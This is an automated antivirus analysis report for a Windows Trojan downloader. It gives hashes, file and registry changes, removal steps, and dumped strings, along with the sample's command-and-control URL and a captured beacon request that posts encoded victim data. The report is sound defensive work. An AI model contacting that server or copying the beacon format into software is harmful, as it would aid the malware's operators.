Trojan.Win32.Inject.sbkt (Kaspersky), Trojan.GenericKD.2070492 (AdAware), TrojanLoadMoney.YR, TrojanDownloaderVundo.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 36b45e5bfb2a8948516251a93752d081
SHA1: 53d77e6dbda8673080f0afbbc9b86cea4fc509d7
SHA256: e9b7f72295578608508ba8ae5df42f9b81f9b1f3139d9264e46d5fd00f286988
SSDeep: 3072:VwJ52Y7ZoH5XJacW4d1VCoiP5lIuKWc7UJYzxj8CSTn:VwHysrwiH4CYz3STn
Size: 110437 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-05-11 23:03:30
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:2040
The Trojan injects its code into the following process(es):
%original file name%.exe:844
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:844 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\config\software (402 bytes)
%System%\config\SOFTWARE.LOG (1603 bytes)
The Trojan deletes the following file(s):
%WinDir%\306197153\ADService (0 bytes)
The process %original file name%.exe:2040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp\concierges.dll (2484 bytes)
%Documents and Settings%\%current user%\Application Data\gambesons.x (1568 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp\concierges.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp (0 bytes)
Registry activity
The process %original file name%.exe:844 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 C7 D7 4B 39 B7 AB 20 CE 82 7B 0B 18 D7 B3 0F"
The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"*306197153"
The process %original file name%.exe:2040 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC 49 B8 A2 F0 51 8E 0A A9 9F DE B5 2D 4B 8F B1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:2040
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\config\software (402 bytes)
%System%\config\SOFTWARE.LOG (1603 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp\concierges.dll (2484 bytes)
%Documents and Settings%\%current user%\Application Data\gambesons.x (1568 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: NirSoft
Product Name: DownTester
Product Version: 1.25.10.3
Legal Copyright: Copyright (c) 2009 - 2010 Nir Sofer
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.25.10.3
File Description: DownTester
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23144 | 23552 | 4.4491 | e50f4a1111bafdc813b1f7ec153b8ea9 |
.rdata | 28672 | 4558 | 4608 | 3.62903 | 640f709ec19b4ed0455a4c64e5934d5e |
.data | 36864 | 108472 | 1024 | 3.37648 | 54c75104a38a6f79dc7a8d3b020a9139 |
.ndata | 147456 | 32768 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 180224 | 7336 | 7680 | 2.89384 | 97ee6ff03cc1ffae2acfafbd13faf3dc |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://23.228.100.130/~vpnmaste/panel/gate.php | |
hxxp://23.228.100.130:80/~vpnmaste/panel/gate.php | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /~vpnmaste/panel/gate.php HTTP/1.1
Host: 23.228.100.130:80
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 468
a=bW5raGlmY3pheHVyc3BldmR5dHFsZ2J3b2o6Z2RlYnl2d3Rxcm9saWphdXBtaHpmY3hza24=&b=vHR5wGU6x25vZXbfY3r1qWQ6MTE4YtA0YtA3NtQ1NDErMWUmYTcrYTbeODA2ZDYrNtI2OTZgvHBmqXY6YWRhqW58YXJnqDj4ODZ8Z2VoZDjeZXNlpG9svGNuwgVtOnF8x3M6V19YUHr2ZXI6pnEoMC44vG5fpDk0LnB8xgV3OnF8&c=ijggdddabbyyvvwtttqqnnol
HTTP/1.1 404 Not Found
Date: Thu, 15 Jan 2015 00:22:36 GMT
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Accept-Ranges: bytes
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_844:
`:%.jN
tL
libgcj-13.dll
Mozilla/4.0 (compatible)
%s--%s
%s\B%i.tmp
http.
hXXp://
hXXps://
%y%m%d
%s:%i
%s\browser%li.html
%s "%s"
Software\Microsoft\Windows NT\CurrentVersion\Windows\load
%s\%s.exe
Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore
NoWindowsUpdate
%s@%s
%s\I%li.bat
%s\U%li.bat
%s\Google\Chrome\Application\chrome.exe
%s\Internet Explorer\iexplore.exe
%s\Opera\opera.exe
%s\Mozilla Firefox\firefox.exe
%s\Maxthon3\Bin\Maxthon.exe
Google Chrome
Opera
Firefox
chrome.exe
opera.exe
firefox.exe
iexplore.exe
Maxthon.exe
%s(%s)
|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:
|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|
%s%s%i%s%s%s%s%s
%s:%s
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
|type:response|uid:%s|taskid:%i|return:%s|busy:%s|
autoruns.exe
explorer.exe
SbieDll.dll
snxhk.dll
dbghelp.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion
76487-640-1457236-23837
76487-644-3177037-23510
55274-640-2673064-23950
76497-640-6308873-23835
Windows Task Manager
%s %i %i
.hidden
filesearch.stop
%s@%s:%i
%s\System32\drivers\etc\protocol
%s\Microsoft.NET\Framework\
v4.0.30319
v2.0.50727
\explorer.exe
HTTP/1.
text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
application/x-www-form-urlencoded
HTTP/1.
dnsapi.dll
%s & %s
Software\Microsoft\Windows\CurrentVersion\
\Microsoft\Windows
%s%s%s%s%i%s%s
:Zone.Identifier
%s\K%li.bat
document.write(unescape('%s'));
operator
operator
global constructors keyed to
global destructors keyed to
operator""
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
fc_key
use_fc_key
hXXp://23.228.100.130/~vpnmaste/panel/gate.php
v1.0.8
~vpnmaste/panel/gate.php
23.228.100.130
%WinDir%
%Program Files%
%Documents and Settings%\All Users
%Documents and Settings%\%current user%
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\All Users\Start Menu\Programs\Startup
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Opera\opera.exe
%Program Files%\Mozilla Firefox\firefox.exe
%Program Files%\Maxthon3\Bin\Maxthon.exe
e.exe
ull)OaJTKCDfzKhXXp://23.228.100.130/~vpnmaste/panel/gate.php80buJEAmbGSSv1.0.8
306197153
c:\%original file name%.exe
%WinDir%\306197153
%WinDir%\306197153\ADService
NICK
JOIN
PRIVMSG
GetProcessHeap
RegCloseKey
RegCreateKeyExA
RegFlushKey
RegOpenKeyExA
ShellExecuteA
InternetOpenUrlA
.text
P`.data
.rdata
`@.eh_fram
0@.bss
.idata
VXa# %D
&%spie);
.kedD
.CRT
KERNEL32.DLL
ADVAPI32.DLL
msvcrt.dll
SHELL32.DLL
USER32.dll
WININET.DLL
Okernel32.dll
advapi32.dll
Aicmp.dll
surlmon.dll
gws2_32.dll
rpcrt4.dll
%original file name%.exe_844_rwx_00400000_00087000: